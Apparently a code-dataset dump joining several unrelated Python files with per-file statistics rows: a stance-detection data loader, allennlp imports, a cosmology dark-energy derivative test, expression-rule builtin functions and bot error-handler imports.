user_friends = np.asarray(user_friends + padding)
else:
user_friends=np.asarray(user_friends)
user_weight_0 = np.ones(len(friends[2:]))
user_weight_1 = np.zeros(largest_friends_number-len(friends[2:]))
user_weight = np.concatenate((user_weight_0,user_weight_1))
##create three stances
isintarget=arr[5]
stance=self.convert_stances(arr[4])
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
for x in xrange(0,3):
if x == stance[0]:
y=1
else:
y=0
item_now=np.zeros(1,dtype='int32')
item_now[0]=x
label_now=np.zeros(1,dtype='int32')
label_now[0]=y
users.append(user_friends)
user_weights.append(user_weight)
items.append(item_now)
labels.append(label_now)
isintargets.append(isintarget)
####reshape
items=np.reshape(np.array(items),(-1,1))
labels = np.reshape(np.array(labels), (-1, 1))
total=favor+against+none
print("NUmber of total user is %d" % len(total_users))
print("NUmber of total tweet is %d" % len(total_tweet))
print("favor=%f against=%f none = %f" %(favor/float(total), against/float(total),none/float(total)))
return np.array(users), items, labels, isintargets, np.asarray(user_weights)
def load_test_file_as_numpy(self, filename,largest_friends_number):
labels = []
users = []
items = []
user_weights= []
isintargets = []
total_users = set()
total_tweet = list()
favor, against, none = 0, 0, 0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends = arr[3].split(":")
if len(friends[2:]) == 0:
continue ##no friends
user = arr[2]
#if user in total_users: ## already have an stance
if user in total_users:
continue
total_users.add(user)
total_tweet.append(user)
user_friends = []
for friend in friends[2:]:
friend_ID = int(friend)
user_friends.append(int(friend_ID - 1))
if len(user_friends) != largest_friends_number:
padding = np.zeros(largest_friends_number - len(user_friends), dtype='int32').tolist()
user_friends = np.asarray(user_friends + padding)
else:
user_friends = np.asarray(user_friends)
user_weight_0 = np.ones(len(friends[2:]))
user_weight_1 = np.zeros(largest_friends_number-len(friends[2:]))
user_weight = np.concatenate((user_weight_0,user_weight_1))
isintarget = arr[5]
stance = self.convert_stances(arr[4]) #0,1,2
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
users.append(user_friends)
user_weights.append(user_weight)
labels.append(stance)
isintargets.append(isintarget)
####reshape
labels = np.reshape(np.array(labels), (-1, 1))
total = favor + against + none
print("NUmber of total user is %d" % len(total_users))
print("NUmber of total tweet is %d" % len(total_tweet))
print("favor=%f against=%f none = %f" % (favor / float(total), against / float(total), none / float(total)))
return np.array(users),labels, isintargets,np.asarray(user_weights)
###n-hot vector
class Dataset(object):
def __init__(self, args):
'''
Constructor
'''
self.num_items = args.num_items
self.num_classes = args.num_classes
self.num_users = args.num_users
Train_data = args.path + args.dataset + "/Train_Athesim_5_Renumbered_000_own.txt"
Test_data = args.path + args.dataset+ "/Test_Athesim_5_Renumbered_000_own.txt"
self.train_users, self.train_items, self.train_labels, self.train_isintargets = self.load_train_file_as_numpy(
Train_data)
self.test_users, self.test_labels, self.test_isintargets= self.load_test_file_as_numpy(
Test_data)
self.t_train_users, self.t_train_labels, self.t_train_isintargets= self.load_test_file_as_numpy(
Train_data)
def convert_stances(self, stance):
#convert stance into np.array of shape [1]
stance_ID=np.zeros(1,dtype="int32")
if stance == 'NONE':
stance_ID[0] = 0
elif stance == 'AGAINST':
stance_ID[0]= 1
elif stance == 'FAVOR':
stance_ID[0] = 2
return stance_ID
def load_train_file_as_numpy(self, filename): #original_num*3
labels = []
users = []
items = []
isintargets = []
total_users=set()
total_tweet=list()
favor,against,none=0,0,0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends=arr[3].split(":")
if len(friends[2:])== 0:
continue ##no friends
user_friends = []
user = arr[2]
if user in total_users: #if user in total_users: # use only the first stance of a user.
continue
total_users.add(user)
total_tweet.append(user)
##padding friendship.
user_friends = np.zeros(self.num_users)
if len(friends[2:])!=0:
for friend in friends[2:]:
friend_ID = int(friend)
user_friends[int(friend_ID-1)]=1
##create three stances
isintarget=arr[5]
stance=self.convert_stances(arr[4])
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
for x in xrange(0,3):
if x == stance[0]:
y=1
else:
y=0
item_now=np.zeros(1,dtype='int32')
item_now[0]=x
label_now=np.zeros(1,dtype='int32')
label_now[0]=y
users.append(user_friends)
items.append(item_now)
labels.append(label_now)
isintargets.append(isintarget)
####reshape
items=np.reshape(np.array(items),(-1,1))
labels = np.reshape(np.array(labels), (-1, 1))
total=favor+against+none
print("NUmber of total user is %d" % len(total_users))
print("NUmber of total tweet is %d" % len(total_tweet))
print("favor=%f against=%f none = %f" %(favor/float(total), against/float(total),none/float(total)))
return np.asarray(users), items, labels, isintargets
def load_test_file_as_numpy(self, filename):
labels = []
users = []
isintargets = []
total_users = set()
total_tweet = list()
num_of_no_friend=0
favor, against, none = 0, 0, 0
with open(filename, "r") as f:
for line in f:
if len(line)<3:
continue
line = line.rstrip("\r\n")
arr = line.split("\t")
friends = arr[3].split(":")
if friends[1] == 0:
continue ##no user
if len(friends[2:]) == 0:
continue
user = arr[2]
#if user in total_users: ## already have an stance
if user in total_users:
continue
total_users.add(user)
total_tweet.append(user)
##padding friendship.
user_friends = np.zeros(self.num_users)
if len(friends[2:]) != 0:
num_of_no_friend+=1
for friend in friends[2:]:
friend_ID = int(friend)
user_friends[int(friend_ID - 1)] = 1
isintarget = arr[5]
stance = self.convert_stances(arr[4]) #0,1,2
#Calculate f,a,n portion.
if stance[0] == 0:
none+=1
elif stance[0] == 1:
against+=1
elif stance[0] == 2:
favor+=1
users.append(user_friends)
labels.append(stance)
isintargets.append(isintarget)
####reshape
labels = np.reshape(np.array(labels), (-1, 1))
total = favor + against + none
print("NUmber of total user is %d" % len(total_users))
print("NUmber of total tweet is %d" % len(total_tweet))
print("Number of no friend is %d"%num_of_no_friend)
print("favor=%f against=%f none = %f" % (favor / float(total), against / float(total), none / float(total)))
return np.asarray(users),labels, isintargets
| 35.821522 | 137 | 0.512456 | 1,587 | 13,648 | 4.218652 | 0.085066 | 0.041075 | 0.059746 | 0.015534 | 0.91531 | 0.911725 | 0.883794 | 0.876027 | 0.853921 | 0.817177 | 0 | 0.024027 | 0.380935 | 13,648 | 380 | 138 | 35.915789 | 0.768375 | 0.055026 | 0 | 0.886926 | 0 | 0 | 0.05063 | 0.012051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031802 | false | 0 | 0.007067 | 0 | 0.070671 | 0.04947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fcb0dcb9a821a4c9ff1eb49053c9b49979af4792 | 169 | py | Python | allennlp_models/seq2seq/copynet/__init__.py | jens321/allennlp-models | cee3a7507cf8d15cd8520808bd9c6381369e868e | [
"Apache-2.0"
] | 1 | 2020-05-19T05:14:50.000Z | 2020-05-19T05:14:50.000Z | allennlp_models/seq2seq/copynet/__init__.py | jens321/allennlp-models | cee3a7507cf8d15cd8520808bd9c6381369e868e | [
"Apache-2.0"
] | null | null | null | allennlp_models/seq2seq/copynet/__init__.py | jens321/allennlp-models | cee3a7507cf8d15cd8520808bd9c6381369e868e | [
"Apache-2.0"
] | null | null | null | from allennlp_models.seq2seq.copynet.copynet_seq2seq_model import CopyNetSeq2Seq
from allennlp_models.seq2seq.copynet.copynet_seq2seq_reader import CopyNetDatasetReader
| 56.333333 | 87 | 0.91716 | 20 | 169 | 7.45 | 0.5 | 0.161074 | 0.241611 | 0.33557 | 0.61745 | 0.61745 | 0.61745 | 0 | 0 | 0 | 0 | 0.031056 | 0.047337 | 169 | 2 | 88 | 84.5 | 0.89441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fcbfa2222d4ef665c94d70e263a049ccb1c082b1 | 8,233 | py | Python | test_eosfn.py | sjforeman/RadioFisher | fe25f969de9a700c5697168ba9e0d2645c55ed81 | [
"AFL-3.0"
] | 3 | 2020-12-05T11:28:47.000Z | 2021-07-09T02:42:21.000Z | test_eosfn.py | sjforeman/RadioFisher | fe25f969de9a700c5697168ba9e0d2645c55ed81 | [
"AFL-3.0"
] | null | null | null | test_eosfn.py | sjforeman/RadioFisher | fe25f969de9a700c5697168ba9e0d2645c55ed81 | [
"AFL-3.0"
] | 2 | 2021-07-09T02:42:23.000Z | 2021-11-30T06:37:47.000Z | #!/usr/bin/python
"""
Test the function that maps from EOS
"""
import numpy as np
import pylab as P
import scipy.integrate
import scipy.interpolate
import radiofisher as rf
from radiofisher.experiments import cosmo
C = 3e5
ax1 = P.subplot(111)
def old_eos_fisher_matrix_derivs(cosmo, cosmo_fns):
"""
Pre-calculate derivatives required to transform (aperp, apar) into dark
energy parameters (Omega_k, Omega_DE, w0, wa, h, gamma).
Returns interpolation functions for d(f,a_perp,par)/d(DE params) as fn. of a.
"""
w0 = cosmo['w0']; wa = cosmo['wa']
om = cosmo['omega_M_0']; ol = cosmo['omega_lambda_0']
ok = 1. - om - ol
# Omega_DE(a) and E(a) functions
omegaDE = lambda a: ol * np.exp(3.*wa*(a - 1.)) / a**(3.*(1. + w0 + wa))
E = lambda a: np.sqrt( om * a**(-3.) + ok * a**(-2.) + omegaDE(a) )
# Derivatives of E(z) w.r.t. parameters
#dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
if np.abs(ok) < 1e-7: # Effectively zero
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a)
else:
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a) * (1. - 1./a)
dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
dE_omegaDE = lambda a: 0.5 / E(a) * (1. - 1./a**3.)
dE_w0 = lambda a: -1.5 * omegaDE(a) * np.log(a) / E(a)
dE_wa = lambda a: -1.5 * omegaDE(a) * (np.log(a) + 1. - a) / E(a)
# Bundle functions into list (for performing repetitive operations with them)
fns = [dE_omegak, dE_omegaDE, dE_w0, dE_wa]
# Set sampling of scale factor, and precompute some values
HH, rr, DD, ff = cosmo_fns
aa = np.linspace(1., 1e-4, 500)
zz = 1./aa - 1.
EE = E(aa); fz = ff(aa)
gamma = cosmo['gamma']; H0 = 100. * cosmo['h']; h = cosmo['h']
# Derivatives of apar w.r.t. parameters
derivs_apar = [f(aa)/EE for f in fns]
# Derivatives of f(z) w.r.t. parameters
f_fac = -gamma * fz / EE
df_domegak = f_fac * (EE/om + dE_omegak(aa))
df_domegaDE = f_fac * (EE/om + dE_omegaDE(aa))
df_w0 = f_fac * dE_w0(aa)
df_wa = f_fac * dE_wa(aa)
df_dh = np.zeros(aa.shape)
df_dgamma = fz * np.log(rf.omegaM_z(zz, cosmo))
derivs_f = [df_domegak, df_domegaDE, df_w0, df_wa, df_dh, df_dgamma]
# Calculate comoving distance (including curvature)
r_c = scipy.integrate.cumtrapz(1./(aa**2. * EE)) # FIXME!
r_c = np.concatenate(([0.], r_c))
if ok > 0.:
r = C/(H0*np.sqrt(ok)) * np.sinh(r_c * np.sqrt(ok))
elif ok < 0.:
r = C/(H0*np.sqrt(-ok)) * np.sin(r_c * np.sqrt(-ok))
else:
r = C/H0 * r_c
# Perform integrals needed to calculate derivs. of aperp
# FIXME: No factor of 2!
print "*"*190
derivs_aperp = [(C/H0)/r[1:] * scipy.integrate.cumtrapz( f(aa)/(aa * EE)**2.)
for f in fns] # FIXME
# Add additional term to curvature integral (idx 1)
# N.B. I think Pedro's result is wrong (for fiducial Omega_k=0 at least),
# so I'm commenting it out
#derivs_aperp[1] -= (H0 * r[1:] / C)**2. / 6.
# Add initial values (to deal with 1/(r=0) at origin)
inivals = [0.5, 0.0, 0., 0.] # FIXME: Are these OK?
derivs_aperp = [ np.concatenate(([inivals[i]], derivs_aperp[i]))
for i in range(len(derivs_aperp)) ]
# Add (h, gamma) derivs to aperp,apar
derivs_aperp += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
derivs_apar += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
# Construct interpolation functions
interp_f = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_f]
interp_apar = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_apar]
interp_aperp = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_aperp]
return [interp_f, interp_aperp, interp_apar]
def eos_fisher_matrix_derivs(cosmo, cosmo_fns):
"""
Pre-calculate derivatives required to transform (aperp, apar) into dark
energy parameters (Omega_k, Omega_DE, w0, wa, h, gamma).
Returns interpolation functions for d(f,a_perp,par)/d(DE params) as fn. of a.
"""
w0 = cosmo['w0']; wa = cosmo['wa']
om = cosmo['omega_M_0']; ol = cosmo['omega_lambda_0']
ok = 1. - om - ol
# Omega_DE(a) and E(a) functions
omegaDE = lambda a: ol * np.exp(3.*wa*(a - 1.)) / a**(3.*(1. + w0 + wa))
E = lambda a: np.sqrt( om * a**(-3.) + ok * a**(-2.) + omegaDE(a) )
# Derivatives of E(z) w.r.t. parameters
#dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
if np.abs(ok) < 1e-7: # Effectively zero
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a)
else:
dE_omegak = lambda a: 0.5 * a**(-2.) / E(a) * (1. - 1./a)
dE_omegaM = lambda a: 0.5 * a**(-3.) / E(a)
dE_omegaDE = lambda a: 0.5 / E(a) * (1. - 1./a**3.)
dE_w0 = lambda a: -1.5 * omegaDE(a) * np.log(a) / E(a)
dE_wa = lambda a: -1.5 * omegaDE(a) * (np.log(a) + 1. - a) / E(a)
# Bundle functions into list (for performing repetitive operations with them)
fns = [dE_omegak, dE_omegaDE, dE_w0, dE_wa]
# Set sampling of scale factor, and precompute some values
HH, rr, DD, ff = cosmo_fns
aa = np.linspace(1., 1e-4, 500)
zz = 1./aa - 1.
EE = E(aa); fz = ff(aa)
gamma = cosmo['gamma']; H0 = 100. * cosmo['h']; h = cosmo['h']
# Derivatives of apar w.r.t. parameters
derivs_apar = [f(aa)/EE for f in fns]
# Derivatives of f(z) w.r.t. parameters
f_fac = -gamma * fz / EE
df_domegak = f_fac * (EE/om + dE_omegak(aa))
df_domegaDE = f_fac * (EE/om + dE_omegaDE(aa))
df_w0 = f_fac * dE_w0(aa)
df_wa = f_fac * dE_wa(aa)
df_dh = np.zeros(aa.shape)
df_dgamma = fz * np.log(rf.omegaM_z(zz, cosmo)) # FIXME: rf.omegaM_z
derivs_f = [df_domegak, df_domegaDE, df_w0, df_wa, df_dh, df_dgamma]
# Calculate comoving distance (including curvature)
r_c = scipy.integrate.cumtrapz(1./(aa**2. * EE), aa) # FIXME!
r_c = np.concatenate(([0.], r_c))
if ok > 0.:
r = C/(H0*np.sqrt(ok)) * np.sinh(r_c * np.sqrt(ok))
elif ok < 0.:
r = C/(H0*np.sqrt(-ok)) * np.sin(r_c * np.sqrt(-ok))
else:
r = C/H0 * r_c
# Perform integrals needed to calculate derivs. of aperp
print "*"*190
derivs_aperp = [(C/H0)/r[1:] * scipy.integrate.cumtrapz( f(aa)/(aa * EE)**2., aa)
for f in fns] # FIXME
# Add additional term to curvature integral (idx 1)
# N.B. I think Pedro's result is wrong (for fiducial Omega_k=0 at least),
# so I'm commenting it out
#derivs_aperp[1] -= (H0 * r[1:] / C)**2. / 6.
# Add initial values (to deal with 1/(r=0) at origin)
inivals = [0.5, 0.0, 0., 0.] # FIXME: Are these OK?
derivs_aperp = [ np.concatenate(([inivals[i]], derivs_aperp[i]))
for i in range(len(derivs_aperp)) ]
# Add (h, gamma) derivs to aperp,apar
derivs_aperp += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
derivs_apar += [np.ones(aa.shape)/h, np.zeros(aa.shape)]
# Construct interpolation functions
interp_f = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_f]
interp_apar = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_apar]
interp_aperp = [scipy.interpolate.interp1d(aa[::-1], d[::-1],
kind='linear', bounds_error=False) for d in derivs_aperp]
return [interp_f, interp_aperp, interp_apar]
# Precompute cosmo functions
cosmo_fns = rf.background_evolution_splines(cosmo)
# OLD
old_f, old_aperp, old_apar = old_eos_fisher_matrix_derivs(cosmo, cosmo_fns)
# NEW
new_f, new_aperp, new_apar = eos_fisher_matrix_derivs(cosmo, cosmo_fns)
z = np.linspace(0., 7., 1000)
a = 1. / (1. + z)
# Plot results
P.subplot(111)
cols = ['r', 'g', 'b', 'y', 'c', 'm']
for i in range(len(new_f)):
P.plot(z, old_f[i](a), lw=1.5, color=cols[i], alpha=0.4)
P.plot(z, new_f[i](a), lw=1.5, color=cols[i], ls='dashed')
P.show()
| 38.471963 | 86 | 0.578647 | 1,378 | 8,233 | 3.333091 | 0.146589 | 0.027433 | 0.017418 | 0.019595 | 0.905726 | 0.902678 | 0.902678 | 0.895275 | 0.886567 | 0.879164 | 0 | 0.034393 | 0.251306 | 8,233 | 213 | 87 | 38.652582 | 0.71074 | 0.205029 | 0 | 0.796748 | 0 | 0 | 0.019729 | 0 | 0 | 0 | 0 | 0.00939 | 0 | 0 | null | null | 0 | 0.04878 | null | null | 0.01626 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fcd10f5842db157a8c3666b3aabeb98b2e774cd5 | 11,043 | py | Python | adoctor-check-executor/adoctor_check_executor/check_rule_plugins/expression_parser/builtin_function.py | seandong37tt4qu/jeszhengq | 32b3737ab45e89e8c5b71cdce871cefd2c938fa8 | [
"MulanPSL-1.0"
] | null | null | null | adoctor-check-executor/adoctor_check_executor/check_rule_plugins/expression_parser/builtin_function.py | seandong37tt4qu/jeszhengq | 32b3737ab45e89e8c5b71cdce871cefd2c938fa8 | [
"MulanPSL-1.0"
] | null | null | null | adoctor-check-executor/adoctor_check_executor/check_rule_plugins/expression_parser/builtin_function.py | seandong37tt4qu/jeszhengq | 32b3737ab45e89e8c5b71cdce871cefd2c938fa8 | [
"MulanPSL-1.0"
] | null | null | null | #!/usr/bin/python3
# ******************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2021-2021. All rights reserved.
# licensed under the Mulan PSL v2.
# You can use this software according to the terms and conditions of the Mulan PSL v2.
# You may obtain a copy of Mulan PSL v2 at:
# http://license.coscl.org.cn/MulanPSL2
# THIS SOFTWARE IS PROVIDED ON AN 'AS IS' BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v2 for more details.
# ******************************************************************************/
"""
Author: YangYunYi
Date: 2021/8/5 15:17
docs: parser.py
description: built-in function of expression check rule
"""
import operator
from adoctor_check_executor.common.check_error import ExpressionFunctionError
def get_operator_function(op_sign):
"""
Get operator function from sign
Args:
op_sign (str): operator sign
Returns:
operator function
"""
return {
'>': operator.gt,
'<': operator.lt,
'>=': operator.ge,
'<=': operator.le,
'==': operator.eq,
'!=': operator.ne,
}[op_sign]
def builtin_count(target, args_list, data_backpack):
"""
Built-in function of Count
Args:
target (str): target data name
args_list(list): argument list [time_shift, data_item, operator]
data_backpack (DataBackpack): data cache
Returns:
count result (int)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 3:
raise ExpressionFunctionError("Invalid num of arguments, %s" % args_list)
time_shift = args_list[0].calculate(data_backpack)
data_pattern = args_list[1].calculate(data_backpack)
judge_op = args_list[2].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
try:
ret = 0
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
if get_operator_function(judge_op)(
data_backpack.get_data_value(index, data_name),
data_pattern):
ret += 1
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_max(target, args_list, data_backpack):
"""
Built-in function of Max
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
max result (int)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
ret = float('-inf')
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
ret = max(data_backpack.get_data_value(index, data_name), ret)
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_min(target, args_list, data_backpack):
"""
Built-in function of min
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
max result (int)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
ret = float('inf')
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
ret = min(data_backpack.get_data_value(index, data_name), ret)
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_sum(target, args_list, data_backpack):
"""
Built-in function of sum
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
max result (int)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
ret = 0
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
ret += data_backpack.get_data_value(index, data_name)
index -= 1
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_avg(target, args_list, data_backpack):
"""
Built-in function of average
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
max result (int)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
time_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
sum_value = 0
try:
cur_time_stamp = data_backpack.get_time_stamp(data_backpack.target_index, data_name)
shift_time_stamp = cur_time_stamp - time_shift
index = data_backpack.target_index
count = index
while index >= 0:
if data_backpack.get_time_stamp(index, data_name) < shift_time_stamp:
break
sum_value += data_backpack.get_data_value(index, data_name)
index -= 1
ret = sum_value / count
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return ret
def builtin_keyword(target, args_list, data_backpack):
"""
Built-in function of Keyword
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
Keyword result (bool)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
keyword = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
if data_value.find(keyword) != -1:
return True
return False
def builtin_diff(target, args_list, data_backpack):
"""
Built-in function of Diff
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
Diff result (bool)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
num_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
if data_backpack.target_index == 0:
raise ExpressionFunctionError("Invalid index is 0")
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
pre_data_value = data_backpack.get_data_value(
data_backpack.target_index - num_shift,
data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return data_value != pre_data_value
def builtin_abschange(target, args_list, data_backpack):
"""
Built-in function of abschange
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
Diff result (bool)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
num_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
if data_backpack.target_index == 0:
raise ExpressionFunctionError("Invalid index is 0")
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
pre_data_value = data_backpack.get_data_value(
data_backpack.target_index - num_shift,
data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return abs(data_value - pre_data_value)
def builtin_change(target, args_list, data_backpack):
"""
Built-in function of abschange
Args:
target (str): target data name
args_list(list): argument list
data_backpack (DataBackpack): data cache
Returns:
Diff result (bool)
Raise:
ExpressionFunctionError
"""
if len(args_list) != 1:
raise ExpressionFunctionError("Invalid num of arguments")
num_shift = args_list[0].calculate(data_backpack)
data_name = data_backpack.get_key_data_name(target)
if data_backpack.target_index == 0:
raise ExpressionFunctionError("Invalid index is 0")
try:
data_value = data_backpack.get_data_value(data_backpack.target_index, data_name)
pre_data_value = data_backpack.get_data_value(
data_backpack.target_index - num_shift,
data_name)
except ExpressionFunctionError as exp:
raise ExpressionFunctionError("calculate failed, %s" % exp) from exp
return data_value - pre_data_value
| 31.551429 | 98 | 0.659603 | 1,342 | 11,043 | 5.170641 | 0.123696 | 0.138348 | 0.067013 | 0.066292 | 0.846231 | 0.84162 | 0.828073 | 0.822165 | 0.809627 | 0.760052 | 0 | 0.007824 | 0.247668 | 11,043 | 349 | 99 | 31.641834 | 0.827395 | 0.262248 | 0 | 0.733333 | 0 | 0 | 0.061376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.012121 | 0 | 0.139394 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fce01480e3edcfc771b7e73f762f26733961d3cc | 121 | py | Python | __init__.py | rhedgeco/general-falcon-webserver | 6a30b56906901de260984e1d808ff5b8943e1206 | [
"MIT"
] | null | null | null | __init__.py | rhedgeco/general-falcon-webserver | 6a30b56906901de260984e1d808ff5b8943e1206 | [
"MIT"
] | null | null | null | __init__.py | rhedgeco/general-falcon-webserver | 6a30b56906901de260984e1d808ff5b8943e1206 | [
"MIT"
] | null | null | null | from .backend.general_manager.app_constructor import WebApp
from .backend.general_manager.databases import SqliteDatabase | 60.5 | 61 | 0.892562 | 15 | 121 | 7 | 0.666667 | 0.209524 | 0.342857 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057851 | 121 | 2 | 61 | 60.5 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
1e3b179f4869466dc8f692bb4f89c1781454507e | 188 | py | Python | handlers/errors/__init__.py | bbt-t/bot-pet-project | 6b0d7862b14fe739be52d87ff8c8610a3f4548e1 | [
"Apache-2.0"
] | null | null | null | handlers/errors/__init__.py | bbt-t/bot-pet-project | 6b0d7862b14fe739be52d87ff8c8610a3f4548e1 | [
"Apache-2.0"
] | null | null | null | handlers/errors/__init__.py | bbt-t/bot-pet-project | 6b0d7862b14fe739be52d87ff8c8610a3f4548e1 | [
"Apache-2.0"
] | null | null | null | from .exception_botblocked import dp
from .exception_messagecantedit import dp
from .exception_messagemotmodified import dp
from .exception_messagecantbedeleted import dp
